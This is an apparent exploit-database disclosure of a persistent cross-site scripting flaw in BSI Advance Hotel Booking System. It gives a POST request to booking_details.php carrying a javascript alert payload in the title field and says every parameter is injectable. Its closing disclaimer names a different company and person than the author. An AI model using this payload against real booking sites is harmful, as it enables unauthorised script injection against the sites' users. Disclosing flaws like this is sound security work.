[+] Exploit Title: BSI Advance Hotel Booking System Persistent XSS Vulnerability
[+] Exploit Author: Angelo Ruwantha
[+] Vendor : http://www.bestsoftinc.com/php-advance-hotel-booking-system.html
[+] Tested on: ArchLinux
Vulnerability
========================
[+]Method:POST
1.http://URL/hotel-booking/booking_details.php (;persistent XSS)
allowlang=&title=<IMG SRC="javascript:alert('HelloWorld ;)');"&fname=&lname=&str_addr=&city=&state=&zipcode=&country=&phone=&fax=&email=&payment_type=&message=&tos=
every parameter injectable :)
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information